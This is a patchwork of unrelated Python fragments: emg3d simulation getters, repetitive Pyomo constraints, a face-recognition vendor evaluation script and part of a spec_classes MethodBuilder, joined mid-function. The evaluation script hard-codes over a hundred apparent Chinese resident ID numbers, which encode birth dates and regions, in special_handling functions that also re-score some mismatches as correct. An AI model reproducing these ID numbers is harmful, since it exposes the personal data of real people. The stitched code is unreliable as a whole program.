Name under which the simulation is stored within the file.
kwargs : Keyword arguments, optional
Passed through to :func:`io.load`.
Returns
-------
simulation : Simulation
A :class:`emg3d.simulations.Simulation` instance.
info : str, returned if verb<0
Info-string.
"""
out = io.load(fname, **kwargs)
if 'verb' in kwargs and kwargs['verb'] < 0:
return out[0][name], out[1]
else:
return out[name]
# GET FUNCTIONS
@property
def data(self):
"""Shortcut to survey.data."""
return self.survey.data
def get_grid(self, source, frequency):
"""Return computational grid of the given source and frequency."""
freq = self._freq_inp2key(frequency)
# Return grid if it exists already.
if self._dict_grid[source][freq] is not None:
return self._dict_grid[source][freq]
# Same grid as for provided model.
if self.gridding == 'same':
# Store link to grid.
self._dict_grid[source][freq] = self.model.grid
# Frequency-dependent grids.
elif self.gridding == 'frequency':
# Initiate dict.
if not hasattr(self, '_grid_frequency'):
self._grid_frequency = {}
# Get grid for this frequency if not yet computed.
if freq not in self._grid_frequency.keys():
# Get grid and store it.
inp = {**self.gridding_opts, 'frequency':
self.survey.frequencies[freq]}
self._grid_frequency[freq] = meshes.construct_mesh(**inp)
# Store link to grid.
self._dict_grid[source][freq] = self._grid_frequency[freq]
# Source-dependent grids.
elif self.gridding == 'source':
# Initiate dict.
if not hasattr(self, '_grid_source'):
self._grid_source = {}
# Get grid for this source if not yet computed.
if source not in self._grid_source.keys():
# Get grid and store it.
center = self.survey.sources[source].center
inp = {**self.gridding_opts, 'center': center}
self._grid_source[source] = meshes.construct_mesh(**inp)
# Store link to grid.
self._dict_grid[source][freq] = self._grid_source[source]
# Source- and frequency-dependent grids.
elif self.gridding == 'both':
# Get grid and store it.
center = self.survey.sources[source].center
inp = {**self.gridding_opts, 'frequency':
self.survey.frequencies[freq], 'center': center}
self._dict_grid[source][freq] = meshes.construct_mesh(**inp)
# Use a single grid for all sources and receivers.
# Default case; catches 'single' but also anything else.
else:
# Get grid if not yet computed.
if not hasattr(self, '_grid_single'):
# Get grid and store it.
self._grid_single = meshes.construct_mesh(**self.gridding_opts)
# Store link to grid.
self._dict_grid[source][freq] = self._grid_single
# Use recursion to return grid.
return self.get_grid(source, frequency)
def get_model(self, source, frequency):
"""Return model on the grid of the given source and frequency."""
grid = self.get_grid(source, self._freq_inp2key(frequency))
return self.model.interpolate_to_grid(grid)
def get_efield(self, source, frequency):
"""Return electric field for given source and frequency."""
freq = self._freq_inp2key(frequency)
# If it doesn't exist yet, compute it.
if self._dict_get('efield', source, freq) is None:
self.compute(source=source, frequency=freq)
return self._dict_get('efield', source, freq)
def get_hfield(self, source, frequency):
"""Return magnetic field for given source and frequency."""
freq = self._freq_inp2key(frequency)
# If electric field not computed yet compute it.
if self._dict_get('efield', source, freq) is None:
self.compute(source=source, frequency=freq)
# Return magnetic field.
return fields.get_magnetic_field(
self.get_model(source, freq),
self._dict_get('efield', source, freq),
)
def get_efield_info(self, source, frequency):
"""Return the solver information of the corresponding computation."""
freq = self._freq_inp2key(frequency)
return self._dict_get('efield_info', source, freq)
def _dict_get(self, which, source, frequency):
"""Return source-frequency pair from dictionary `which`.
Thin wrapper | |
= Constraint(expr= m.x590 - m.b808 <= 0)
m.c592 = Constraint(expr= m.x591 - m.b808 <= 0)
m.c593 = Constraint(expr= m.x592 - m.b808 <= 0)
m.c594 = Constraint(expr= m.x593 - m.b808 <= 0)
m.c595 = Constraint(expr= m.x594 - m.b808 <= 0)
m.c596 = Constraint(expr= m.x595 - m.b808 <= 0)
m.c597 = Constraint(expr= m.x596 - m.b808 <= 0)
m.c598 = Constraint(expr= m.x597 - m.b808 <= 0)
m.c599 = Constraint(expr= m.x598 - m.b808 <= 0)
m.c600 = Constraint(expr= m.x599 - m.b808 <= 0)
m.c601 = Constraint(expr= m.x600 - m.b808 <= 0)
m.c602 = Constraint(expr= m.x601 - m.b808 <= 0)
m.c603 = Constraint(expr= m.x602 - m.b808 <= 0)
m.c604 = Constraint(expr= m.x603 - m.b808 <= 0)
m.c605 = Constraint(expr= m.x604 - m.b808 <= 0)
m.c606 = Constraint(expr= m.x605 - m.b808 <= 0)
m.c607 = Constraint(expr= m.x606 - m.b808 <= 0)
m.c608 = Constraint(expr= m.x607 - m.b808 <= 0)
m.c609 = Constraint(expr= m.x608 - m.b808 <= 0)
m.c610 = Constraint(expr= m.x609 - m.b808 <= 0)
m.c611 = Constraint(expr= m.x610 - m.b808 <= 0)
m.c612 = Constraint(expr= m.x611 - m.b808 <= 0)
m.c613 = Constraint(expr= m.x612 - m.b808 <= 0)
m.c614 = Constraint(expr= m.x613 - m.b808 <= 0)
m.c615 = Constraint(expr= m.x614 - m.b808 <= 0)
m.c616 = Constraint(expr= m.x615 - m.b808 <= 0)
m.c617 = Constraint(expr= m.x616 - m.b808 <= 0)
m.c618 = Constraint(expr= m.x617 - m.b808 <= 0)
m.c619 = Constraint(expr= m.x618 - m.b808 <= 0)
m.c620 = Constraint(expr= m.x619 - m.b808 <= 0)
m.c621 = Constraint(expr= m.x620 - m.b808 <= 0)
m.c622 = Constraint(expr= m.x621 - m.b808 <= 0)
m.c623 = Constraint(expr= m.x622 - m.b808 <= 0)
m.c624 = Constraint(expr= m.x623 - m.b808 <= 0)
m.c625 = Constraint(expr= m.x624 - m.b808 <= 0)
m.c626 = Constraint(expr= m.x625 - m.b808 <= 0)
m.c627 = Constraint(expr= m.x626 - m.b808 <= 0)
m.c628 = Constraint(expr= m.x627 - m.b808 <= 0)
m.c629 = Constraint(expr= m.x628 - m.b808 <= 0)
m.c630 = Constraint(expr= m.x629 - m.b808 <= 0)
m.c631 = Constraint(expr= m.x630 - m.b808 <= 0)
m.c632 = Constraint(expr= m.x631 - m.b808 <= 0)
m.c633 = Constraint(expr= m.x632 - m.b808 <= 0)
m.c634 = Constraint(expr= m.x633 - m.b808 <= 0)
m.c635 = Constraint(expr= m.x634 - m.b808 <= 0)
m.c636 = Constraint(expr= m.x635 - m.b808 <= 0)
m.c637 = Constraint(expr= m.x636 - m.b808 <= 0)
m.c638 = Constraint(expr= m.x637 - m.b808 <= 0)
m.c639 = Constraint(expr= m.x638 - m.b808 <= 0)
m.c640 = Constraint(expr= m.x639 - m.b808 <= 0)
m.c641 = Constraint(expr= m.x640 - m.b808 <= 0)
m.c642 = Constraint(expr= m.x641 - m.b809 <= 0)
m.c643 = Constraint(expr= m.x642 - m.b809 <= 0)
m.c644 = Constraint(expr= m.x643 - m.b809 <= 0)
m.c645 = Constraint(expr= m.x644 - m.b809 <= 0)
m.c646 = Constraint(expr= m.x645 - m.b809 <= 0)
m.c647 = Constraint(expr= m.x646 - m.b809 <= 0)
m.c648 = Constraint(expr= m.x647 - m.b809 <= 0)
m.c649 = Constraint(expr= m.x648 - m.b809 <= 0)
m.c650 = Constraint(expr= m.x649 - m.b809 <= 0)
m.c651 = Constraint(expr= m.x650 - m.b809 <= 0)
m.c652 = Constraint(expr= m.x651 - m.b809 <= 0)
m.c653 = Constraint(expr= m.x652 - m.b809 <= 0)
m.c654 = Constraint(expr= m.x653 - m.b809 <= 0)
m.c655 = Constraint(expr= m.x654 - m.b809 <= 0)
m.c656 = Constraint(expr= m.x655 - m.b809 <= 0)
m.c657 = Constraint(expr= m.x656 - m.b809 <= 0)
m.c658 = Constraint(expr= m.x657 - m.b809 <= 0)
m.c659 = Constraint(expr= m.x658 - m.b809 <= 0)
m.c660 = Constraint(expr= m.x659 - m.b809 <= 0)
m.c661 = Constraint(expr= m.x660 - m.b809 <= 0)
m.c662 = Constraint(expr= m.x661 - m.b809 <= 0)
m.c663 = Constraint(expr= m.x662 - m.b809 <= 0)
m.c664 = Constraint(expr= m.x663 - m.b809 <= 0)
m.c665 = Constraint(expr= m.x664 - m.b809 <= 0)
m.c666 = Constraint(expr= m.x665 - m.b809 <= 0)
m.c667 = Constraint(expr= m.x666 - m.b809 <= 0)
m.c668 = Constraint(expr= m.x667 - m.b809 <= 0)
m.c669 = Constraint(expr= m.x668 - m.b809 <= 0)
m.c670 = Constraint(expr= m.x669 - m.b809 <= 0)
m.c671 = Constraint(expr= m.x670 - m.b809 <= 0)
m.c672 = Constraint(expr= m.x671 - m.b809 <= 0)
m.c673 = Constraint(expr= m.x672 - m.b809 <= 0)
m.c674 = Constraint(expr= m.x673 - m.b809 <= 0)
m.c675 = Constraint(expr= m.x674 - m.b809 <= 0)
m.c676 = Constraint(expr= m.x675 - m.b809 <= 0)
m.c677 = Constraint(expr= m.x676 - m.b809 <= 0)
m.c678 = Constraint(expr= m.x677 - m.b809 <= 0)
m.c679 = Constraint(expr= m.x678 - m.b809 <= 0)
m.c680 = Constraint(expr= m.x679 - m.b809 <= 0)
m.c681 = Constraint(expr= m.x680 - m.b809 <= 0)
m.c682 = Constraint(expr= m.x681 - m.b809 <= 0)
m.c683 = Constraint(expr= m.x682 - m.b809 <= 0)
m.c684 = Constraint(expr= m.x683 - m.b809 <= 0)
m.c685 = Constraint(expr= m.x684 - m.b809 <= 0)
m.c686 = Constraint(expr= m.x685 - m.b809 <= 0)
m.c687 = Constraint(expr= m.x686 - m.b809 <= 0)
m.c688 = Constraint(expr= m.x687 - m.b809 <= 0)
m.c689 = Constraint(expr= m.x688 - m.b809 <= 0)
m.c690 = Constraint(expr= m.x689 - m.b809 <= 0)
m.c691 = Constraint(expr= m.x690 - m.b809 <= 0)
m.c692 = Constraint(expr= m.x691 - m.b809 <= 0)
m.c693 = Constraint(expr= m.x692 - m.b809 <= 0)
m.c694 = Constraint(expr= m.x693 - m.b809 <= 0)
m.c695 = Constraint(expr= m.x694 - m.b809 <= 0)
m.c696 = Constraint(expr= m.x695 - m.b809 <= 0)
m.c697 = Constraint(expr= m.x696 - m.b809 <= 0)
m.c698 = Constraint(expr= m.x697 - m.b809 <= 0)
m.c699 = Constraint(expr= m.x698 - m.b809 <= 0)
m.c700 = Constraint(expr= m.x699 - m.b809 <= 0)
m.c701 = Constraint(expr= m.x700 - m.b809 <= 0)
m.c702 = Constraint(expr= m.x701 - m.b809 <= 0)
m.c703 = Constraint(expr= m.x702 - m.b809 <= 0)
m.c704 = Constraint(expr= m.x703 - m.b809 <= 0)
m.c705 = Constraint(expr= m.x704 - m.b809 <= 0)
m.c706 = Constraint(expr= m.x705 - m.b809 <= 0)
m.c707 = Constraint(expr= m.x706 - m.b809 <= 0)
m.c708 = Constraint(expr= m.x707 - m.b809 <= 0)
m.c709 = Constraint(expr= m.x708 - m.b809 <= 0)
m.c710 = Constraint(expr= m.x709 - m.b809 <= 0)
m.c711 = Constraint(expr= m.x710 - m.b809 <= 0)
m.c712 = Constraint(expr= m.x711 - m.b809 <= 0)
m.c713 = Constraint(expr= m.x712 - m.b809 <= 0)
m.c714 = Constraint(expr= m.x713 - m.b809 <= 0)
m.c715 = Constraint(expr= m.x714 - m.b809 <= 0)
m.c716 = Constraint(expr= m.x715 - m.b809 <= 0)
m.c717 = Constraint(expr= m.x716 - m.b809 <= 0)
m.c718 = Constraint(expr= m.x717 - m.b809 <= 0)
m.c719 = Constraint(expr= m.x718 - m.b809 <= 0)
m.c720 = Constraint(expr= m.x719 - m.b809 <= 0)
m.c721 = Constraint(expr= m.x720 - m.b809 <= 0)
m.c722 = Constraint(expr= m.x721 - m.b810 <= 0)
m.c723 = Constraint(expr= m.x722 - m.b810 <= 0)
m.c724 = Constraint(expr= m.x723 - m.b810 <= 0)
m.c725 = Constraint(expr= m.x724 - m.b810 <= 0)
m.c726 = Constraint(expr= m.x725 - m.b810 <= 0)
m.c727 = Constraint(expr= m.x726 - m.b810 <= 0)
m.c728 = Constraint(expr= m.x727 - m.b810 <= 0)
m.c729 = Constraint(expr= m.x728 - m.b810 <= 0)
m.c730 = Constraint(expr= m.x729 - m.b810 <= 0)
m.c731 = Constraint(expr= m.x730 - m.b810 <= 0)
m.c732 = Constraint(expr= m.x731 - m.b810 <= 0)
m.c733 = Constraint(expr= m.x732 - m.b810 <= 0)
m.c734 = Constraint(expr= m.x733 - m.b810 <= 0)
m.c735 = Constraint(expr= m.x734 - m.b810 <= 0)
m.c736 = Constraint(expr= m.x735 - m.b810 <= 0)
m.c737 = Constraint(expr= m.x736 - m.b810 <= 0)
m.c738 = Constraint(expr= m.x737 - m.b810 <= 0)
m.c739 = Constraint(expr= m.x738 - m.b810 <= 0)
m.c740 = Constraint(expr= m.x739 - m.b810 <= 0)
m.c741 = Constraint(expr= m.x740 - m.b810 <= 0)
m.c742 = Constraint(expr= m.x741 - m.b810 <= 0)
m.c743 = Constraint(expr= m.x742 - m.b810 <= 0)
m.c744 = Constraint(expr= m.x743 - m.b810 <= 0)
m.c745 = Constraint(expr= m.x744 - m.b810 <= 0)
m.c746 = Constraint(expr= m.x745 - m.b810 <= 0)
m.c747 = Constraint(expr= m.x746 - m.b810 <= 0)
m.c748 = Constraint(expr= m.x747 - m.b810 <= 0)
m.c749 = Constraint(expr= m.x748 - m.b810 <= 0)
m.c750 = Constraint(expr= m.x749 - m.b810 <= 0)
m.c751 = Constraint(expr= m.x750 - m.b810 <= 0)
m.c752 = Constraint(expr= m.x751 - m.b810 <= 0)
m.c753 = Constraint(expr= m.x752 - m.b810 <= 0)
m.c754 = Constraint(expr= m.x753 - m.b810 <= 0)
m.c755 = Constraint(expr= m.x754 - m.b810 <= 0)
m.c756 = Constraint(expr= m.x755 - m.b810 <= 0)
m.c757 = Constraint(expr= m.x756 - m.b810 <= 0)
m.c758 = Constraint(expr= m.x757 - m.b810 <= 0)
m.c759 = Constraint(expr= m.x758 - m.b810 <= 0)
m.c760 = Constraint(expr= m.x759 - m.b810 <= 0)
m.c761 = Constraint(expr= m.x760 - m.b810 <= 0)
m.c762 = Constraint(expr= m.x761 - m.b810 <= 0)
m.c763 = Constraint(expr= m.x762 - m.b810 <= 0)
m.c764 = Constraint(expr= m.x763 - m.b810 <= 0)
m.c765 = Constraint(expr= m.x764 - m.b810 <= 0)
m.c766 = Constraint(expr= m.x765 - m.b810 <= 0)
m.c767 = Constraint(expr= m.x766 - m.b810 <= 0)
m.c768 = Constraint(expr= m.x767 - m.b810 <= 0)
m.c769 = Constraint(expr= m.x768 - m.b810 <= 0)
m.c770 = Constraint(expr= m.x769 - m.b810 <= 0)
m.c771 = Constraint(expr= m.x770 - m.b810 <= 0)
m.c772 = Constraint(expr= m.x771 - m.b810 <= 0)
m.c773 = Constraint(expr= m.x772 - m.b810 <= | |
(orgPID == '310108196011191241' and cpy_PID == '4C654D1A9BA641A2B07138827E75DDDE') or \
(orgPID == '310108196309290429' and cpy_PID == '2D8E3099583741E28959B99A7BC51384') or \
(orgPID == '310105195810290437' and cpy_PID == 'A1464847BCB84703BC536F7084B2376D') or \
(orgPID == '31022219640615363X' and cpy_PID == '7DB9AE40AA014E979447D192766B7026') or \
(orgPID == '310102195802053619' and cpy_PID == 'BD5004898DAE463A89B23AB52C14CE82') or \
(orgPID == '320223198107286173' and cpy_PID == 'E8254F3336FE486DA2458C6DC0B6CD60') or \
(orgPID == '31010519920825161X' and cpy_PID == '606C09A83B1546C9AB07943B082C0625') or \
(orgPID == '31022819790820361X' and cpy_PID == '8FD154CE716840B3BB5AFE80CE8F8BD7') or \
(orgPID == '35260219780709161X' and cpy_PID == '849002298AA9444A888BB88436774047') or \
(orgPID == '37083219820521493X' and cpy_PID == '5814C05F1B6A4411ACCCB4D25D67BD84') or \
(orgPID == '130481197912082717' and cpy_PID == '51F2A2A772F1465D9BCD64F5440D9B9E') or \
(orgPID == '211224197506262758' and cpy_PID == 'CFCDF16C48514C8AA4BC722CB48CE4ED') or \
(orgPID == '220202198511287228' and cpy_PID == '541CD98EB2C04FDEB7756F3471A43CB9') or \
(orgPID == '230223198706081610' and cpy_PID == '1AFBD5F6B35048B0ABB00A877A7D110A') or \
(orgPID == '230823197401180018' and cpy_PID == 'DC84FAF0C6B8424EA720DA02F2E1B776') or \
(orgPID == '310102195802053619' and cpy_PID == 'BD5004898DAE463A89B23AB52C14CE82') or \
(orgPID == '310106195111081616' and cpy_PID == '5635CCD3CD9C471DAF729DE119B7888D') or \
(orgPID == '310108195602103237' and cpy_PID == '369836D6D105466ABE81159DF2DD818F') or \
(orgPID == '310109194502194815' and cpy_PID == '12EF830CF6864537B858238AC1B94A08') or \
(orgPID == '310109196511221255' and cpy_PID == '3107B818A95D41808BD093B75AC75567') or \
(orgPID == '310109198202111537' and cpy_PID == 'F35F2FD4596F46D4841D5EA3D3E4F7ED') or \
(orgPID == '310110196007285052' and cpy_PID == '345800C17372462D9D8666CC6B47A858') or \
(orgPID == '310110196012243244' and cpy_PID == '46828B0EF3224915B853AF157C7157D5') or \
(orgPID == '310110198312035614' and cpy_PID == '6E0BFF9E70534EDDBCBD2FF1E2BB6C81') or \
(orgPID == '310115198701257714' and cpy_PID == 'C32A14FCBAA24DBEA681B8E218898B52') or \
(orgPID == '310221195201203612' and cpy_PID == 'F137D7E607D84F54B0370D81664C9758') or \
(orgPID == '310222194307203612' and cpy_PID == 'D5E1CE6EBAB741DC90FE881451BD1BC5') or \
(orgPID == '310222194307203612' and cpy_PID == '1CC2C319F4114D6BB7A758AD1D0CBB60') or \
(orgPID == '310222194402273811' and cpy_PID == '9C04DF150DD6441384FF3503CCF10DB0') or \
(orgPID == '310228196208063615' and cpy_PID == 'EEE48904C8A2448CB4E782ACB7469CBD') or \
(orgPID == '310230196301221499' and cpy_PID == '3FF5B6E6A0374FD693DE220104947AE2') or \
(orgPID == '320223198107286173' and cpy_PID == 'E8254F3336FE486DA2458C6DC0B6CD60') or \
(orgPID == '320822197210222137' and cpy_PID == '8632A1E0CAC0423A8F7C09B63B6171B3') or \
(orgPID == '321084199207243215' and cpy_PID == '310109198102152016') or \
(orgPID == '310109198102152016' and cpy_PID == '321084199207243215') or \
(orgPID == '330211197004250719' and cpy_PID == 'C7E68AEE1A004A9988553274B5F85FFD') or \
(orgPID == '330902198411260312' and cpy_PID == '1EED130D77BF41D48688A92989EBF145') or \
(orgPID == '340621197511065258' and cpy_PID == '1D75A554984742698AE3F05F33D7C3EB') or \
(orgPID == '342426197107170016' and cpy_PID == '5087C8C111A94CA9A74F3E80131B1A37') or \
(orgPID == '350125196501012916' and cpy_PID == '277EE512DF61406899164A53E211F93E') or \
(orgPID == '350782197201204515' and cpy_PID == '1AD59D1A6D914E34BC29FE58FAF18940') or \
(orgPID == '352230198105090629' and cpy_PID == 'F77620A13762434191C8046906108BC6') or \
(orgPID == '371312198601016474' and cpy_PID == '310230198512242512') or \
(orgPID == '310230198512242512' and cpy_PID == '371312198601016474') or \
(orgPID == '410204196408274014' and cpy_PID == '310107196808284617') or \
(orgPID == '310107196808284617' and cpy_PID == '410204196408274014') or \
(orgPID == '412322197705157812' and cpy_PID == '371525198409111714') or \
(orgPID == '371525198409111714' and cpy_PID == '412322197705157812') or \
(orgPID == '412724198008206112' and cpy_PID == '992844447DC6417DA222988FA23DD842') or \
(orgPID == '432425197609135822' and cpy_PID == 'AB3DB3EDC74B4789BFECEC5743B39929') or \
(orgPID == '432925194711116920' and cpy_PID == '8E779D0A38FC41AEBF2C2FBE6E5815AF') or \
(orgPID == '440520196701272810' and cpy_PID == 'B00765F89E324C98B8884CA1AF287FD9') or \
(orgPID == '440582198803020639' and cpy_PID == '5D923ED1698F418DA36FF56578554CFE') or \
(orgPID == '440583199001024516' and cpy_PID == '62FFBBE15BD447C18293BDF756D9D25F') or \
(orgPID == '440881198002257214' and cpy_PID == '26E533EF76834B6F8275008F8FA4EFEA') or \
(orgPID == '440882198202211110' and cpy_PID == '30C7C949C4F140DAA196ED2536E97E48') or \
(orgPID == '440982199402011471' and cpy_PID == 'A46134790C964A9786C67406742AB4F0') or \
(orgPID == '450126199509016122' and cpy_PID == '3D83EC7F57C844C38736746B60BD59B7') or \
(orgPID == '450521198111255217' and cpy_PID == 'F688B9E3C0554A399A218AF849D8E1A4') or \
(orgPID == '452124196806182771' and cpy_PID == 'B1C7746596544B7C9D5AB4ED9916CFDD') or \
(orgPID == '452226199606200017' and cpy_PID == 'B92E0127F501495AB7F08D8E5A10AF12') or \
(orgPID == '452623197907062416' and cpy_PID == '156984236C524460B3C57463AF56E8D3') or \
(orgPID == '460035198210152515' and cpy_PID == '4F77359C5A6D4BEDA6E1443721BA3C15') or \
(orgPID == '513721198908253390' and cpy_PID == '4EE2CDD0B7394736AE2156CC6DCA70B4') or \
(orgPID == '310102196209091272' and cpy_PID == 'FC6A3518F97B4444BA6E30C64806CFD0') or \
(orgPID == '310110196109044217' and cpy_PID == 'A0363892CA9E47E98666A3BB5CE6D060') or \
(orgPID == '310224197507239317' and cpy_PID == 'ADF0B987FD8F4ED5A77CD176BBA412F5') or \
(orgPID == '432925194711116920' and cpy_PID == '2D98E23A0224460FAED2DA0B31F5FA5F') or \
(orgPID == '310110196012243244' and cpy_PID == '719E6ACFFEA241C8B470E404679B9E8A') or \
\
(orgPID == '132627196312308612' and cpy_PID == '6B27B584F64B45D3B95B9ACF5842A7BF') or \
(orgPID == '310102196209091272' and cpy_PID == 'C0E4DE979BEB4EA9A5ACD7BB12C13C3C') or \
(orgPID == '310103194501102415' and cpy_PID == '2ABB86E9594F4054873EEF75283B5620') or \
(orgPID == '31011019530117245X' and cpy_PID == '074F7E8AEECA44629B1563253AE837B3') or \
(orgPID == '310221195201203612' and cpy_PID == 'C229275B5EE24786B3EF12B837C48C9F') or \
(orgPID == '310222193410113610' and cpy_PID == '8486F4004F004C6C8B03B6773D52F793') or \
(orgPID == '310222193410113610' and cpy_PID == '8486F4004F004C6C8B03B6773D52F793') or \
(orgPID == '310222193410113610' and cpy_PID == '8486F4004F004C6C8B03B6773D52F793') or \
(orgPID == '31022219640615363X' and cpy_PID == '48DAD73262634E5E845C1237D3F46193') or \
(orgPID == '320802199001221510' and cpy_PID == 'EDB853B04345463CA0A6D17CF37F6412') or \
(orgPID == '330211197004250719' and cpy_PID == '85A2048EA163464183E2165AFA853335') or \
(orgPID == '330211197004250719' and cpy_PID == '85A2048EA163464183E2165AFA853335') or \
(orgPID == '340221197612122870' and cpy_PID == 'CA9FF646A0C44B14B64E3E75462F12E3') or \
(orgPID == '360121199403082443' and cpy_PID == '371824D81A62459D9DF3D73F89B14404') or \
(orgPID == '370402198104050649' and cpy_PID == '0F5D33CA436E4B5794EABBD63D6AA537') or \
(orgPID == '379014197404216054' and cpy_PID == '7BB62098E5F54871AFBA6AAAF1261813') or \
(orgPID == '432925194711116920' and cpy_PID == '0953B53CE4424F43AB94F9E7FE81FFF8') or \
(orgPID == '510322198010033836' and cpy_PID == '6C58703A09F44D2D84A4890963D5F746') or \
(orgPID == '51162119870920429X' and cpy_PID == '1E4C2743204F43CBA5AC9B5547DA23A0') or \
(orgPID == '51162119870920429X' and cpy_PID == '1E4C2743204F43CBA5AC9B5547DA23A0') or \
(orgPID == '513231198012220313' and cpy_PID == 'A951EBEF153C48A2BEB910294B3DB058') or \
(orgPID == '310228198104046019' and cpy_PID == 'C99F212EA65B4A22BE6AEFC728DA69F1') \
:
return True
else:
return False
def special_handling2(orgPID,orgIMGID,cpy_PID): #处理错误标
#return False
if (orgPID=='310108197801294434' and orgIMGID=='17' and cpy_PID=='310107197203201211')\
or (orgPID == '310113197403192417' and orgIMGID == '5' and cpy_PID == '310111197103170416')\
or (orgPID == '310114198209140032' and orgIMGID == '5' and cpy_PID == '310222196710010211')\
or (orgPID == '310222197312170214' and orgIMGID == '7' and cpy_PID == '310114197704033213'):
return True
else:
return False
def special_handling3(orgPID,cpy_PID):
if (orgPID == '372923198506065975'and cpy_PID== '372923198708143812') or \
(orgPID == '320826198910202217' and cpy_PID == '31010219890602121X') or \
(orgPID == '452130198601203010' and cpy_PID == '310115199307122912') or \
(orgPID == '320625197909216695' and cpy_PID == '310110198010293255') or \
(orgPID == '310110197412140812' and cpy_PID == '310109198312283591') :
return True
elif( orgPID == '372923198506065975'and cpy_PID== '372923198506065975') or \
(orgPID == '320826198910202217' and cpy_PID == '320826198910202217') or \
(orgPID == '452130198601203010' and cpy_PID == '452130198601203010') or \
(orgPID == '320625197909216695' and cpy_PID == '320625197909216695') or \
(orgPID == '310110197412140812' and cpy_PID == '310110197412140812'):
return False
elif orgPID == cpy_PID:
return True
return False
def kcf_test(threshold = 0.927,resaveimgflag=False):
all=0
right=0
wrong=0
for line in retlist:
line = line.strip()
orgPID, orgImg , kcf_PID , kcf_IMG ,kcf_dist = line.split(',')
all=all+1
if resaveimgflag and kcf_PID=='' and kcf_IMG=='': #未召回
reSaveImg(orgPID, orgImg, kcf_PID, kcf_IMG, 'kc', threshold, 'unrecall')
#kcf
if special_handling3(orgPID,kcf_PID) or special_handling(orgPID,kcf_PID) or special_handling2(orgPID,orgImg,kcf_PID):
if float(kcf_dist) < threshold:
#正确召回
right=right+1
continue
if orgPID != kcf_PID and kcf_PID!='':
if float(kcf_dist) < threshold:
#误识召回
wrong=wrong+1
print(orgPID, kcf_PID)
if resaveimgflag :
reSaveImg(orgPID, orgImg, kcf_PID, kcf_IMG, 'kc', threshold, 'error')
print('暴力库_threshold:',threshold,'召回率:',right/all,'误识率:',wrong/all)
def st_test(threshold=0.927,resaveimgflag=False):
all = 0
right = 0
wrong = 0
for line in retlist:
line = line.strip()
orgPID, orgIMG, \
_, kcf_similarity, kcf_dist, kcf_PID, kcf_IMG, \
_, st_similarity, _, st_PID, st_IMGID, \
_, yt_similarity, _, yt_PID, yt_IMGID = line.split(',')
all = all + 1
if resaveimgflag and st_PID=='' and st_IMGID=='': #未召回
reSaveImg(orgPID, orgIMG, st_PID, st_IMGID.strip(), 'st', threshold, 'unrecall')
# st
if orgPID == st_PID or special_handling(orgPID,st_PID) or special_handling2(orgPID,orgIMG,st_PID) :
if float(st_similarity) > threshold:
# 正确召回
right = right + 1
continue
if orgPID != st_PID and st_PID!='':
#print(st_similarity)
if float(st_similarity) > threshold:
# 误识召回
wrong = wrong + 1
if resaveimgflag :
reSaveImg(orgPID, orgIMG, st_PID, st_IMGID.strip(), 'st', threshold, 'error')
print('商汤_threshold:', threshold, '召回率:', right / all, '误识率:', wrong / all)
def yt_test(threshold=0.927,resaveimgflag=False):
all = 0
right = 0
wrong = 0
for line in retlist:
line = line.strip()
orgPID, orgIMG, \
_, kcf_similarity, kcf_dist, kcf_PID, kcf_IMG, \
_, st_similarity, _, st_PID, st_IMGID, \
_, yt_similarity, _, yt_PID, yt_IMGID = line.split(',')
all = all + 1
if resaveimgflag and yt_PID=='' and yt_IMGID=='': #未召回
reSaveImg(orgPID, orgIMG, yt_PID, yt_IMGID.strip(), 'yt', threshold, 'unrecall')
# yt
if orgPID == yt_PID or special_handling(orgPID,yt_PID) or special_handling2(orgPID,orgIMG,yt_PID):
if float(yt_similarity) > threshold:
# 正确召回
right = right + 1
continue
if orgPID != yt_PID and yt_PID!='':
#print(yt_similarity)
if float(yt_similarity) > threshold:
# 误识召回
wrong = wrong + 1
if resaveimgflag :
reSaveImg(orgPID, orgIMG, yt_PID, yt_IMGID.strip(), 'yt', threshold, 'error')
print('依图_threshold:', threshold, '召回率:', | |
from __future__ import annotations
import inspect
import textwrap
from inspect import Parameter, Signature, cleandoc
from typing import Any, Callable, Dict, List, Optional, Tuple, Type, Union
from spec_classes.types import MISSING
from spec_classes.utils.type_checking import type_label
class MethodBuilder:
"""
Build a user-friendly wrapper around a callable implementation.
Methods built using this buiilder are:
- documented
- annotated
- potentially more restrictive than the underlying callable (for example
perhaps certain attributes cannot be passed).
Within spec-classes this builder is used to generate all helper methods,
so that users can introspect the method using `help` (or other tools)
and get useful information.
After the specification is completed by the various `.with_*()` methods, you
should call `.build()` to assemble the method and retrieve the function
handle.
Attributes:
Passable via constructor:
name: The name of the method being built.
implementation: The underlying callable around which the method is being
built.
Populated via builder methods:
doc_preamble: The preamble in the documentation string (to which
argument documentation will be appended).
doc_args: The docstrings for each argument to the method being
built (in the order they were added).
doc_returns: A string description of the value returned by the
method being built.
doc_notes: Any additional strings to be appended as notes in the
methods docstring.
method_args: A list of `Parameters` for the method signature.
method_args_virtual: A list of "virtual" `Parameters` for the method
signature (see notes below).
method_return_type: The return type of the method being built.
Notes:
- "virtual" arguments are arguments that are not directly encoded into
the generated method's signature, but which should appear in the
user-facing advertised signature. Under the hood these are fed into
the method via `**kwargs`. These are useful when you don't want
attrs to be present in the `**kwargs` of an implementation unless
the user has explicitly passed them. Also note that default values
for virtual arguments are only for documentation purposes, and are
not passed on to the underlying implementation. For this reason they
should not be populated or corresponding to underlying defaults.
"""
def __init__(self, name: str, implementation: Callable):
self.name = name
self.implementation = implementation
# Documentation attributes
self.doc_preamble: str = ""
self.doc_args: List[str] = []
self.doc_returns: str = ""
self.doc_notes: List[str] = []
# Method signature
self.method_args: List[Parameter] = [
Parameter("self", Parameter.POSITIONAL_OR_KEYWORD)
]
self.method_args_virtual: List[Parameter] = []
self.method_return_type: Optional[Type] = None
self.check_attrs_match_sig = ( # TODO: Remove this
True # This is toggled if signature contains a var_kwarg parameter.
)
# Signature related methods
def with_arg(
self,
name: str,
*,
desc: str,
annotation: Type = Parameter.empty,
default: Any = Parameter.empty,
kind: Union[str, inspect._ParameterKind] = Parameter.POSITIONAL_OR_KEYWORD,
virtual: bool = False,
only_if: bool = True,
) -> MethodBuilder:
"""
Append an argument to the method wrapper. The kind of the argument must
make sense given the arguments already in the method (e.g. `VAR_KEYWORD`
attributes should come after all other arguments, etc).
Args:
name: The name of the argument.
desc: A description for the argument (will be added to the method
docstring).
annotation: An (optional) type for the argument.
default: A default value for the argument (optional unless `kind`
is `KEYWORD_ONLY`.
kind: The kind of argument. For convenience you can pass a string
here instead of the enum value. Options are: 'positional_only',
'positional_or_keyword', 'var_positional', 'keyword_only',
and 'var_keyword'. Note that virtual arguments can only be
'keyword_only' and 'var_keyword'.
virtual: Whether the arguments should be compiled into the method
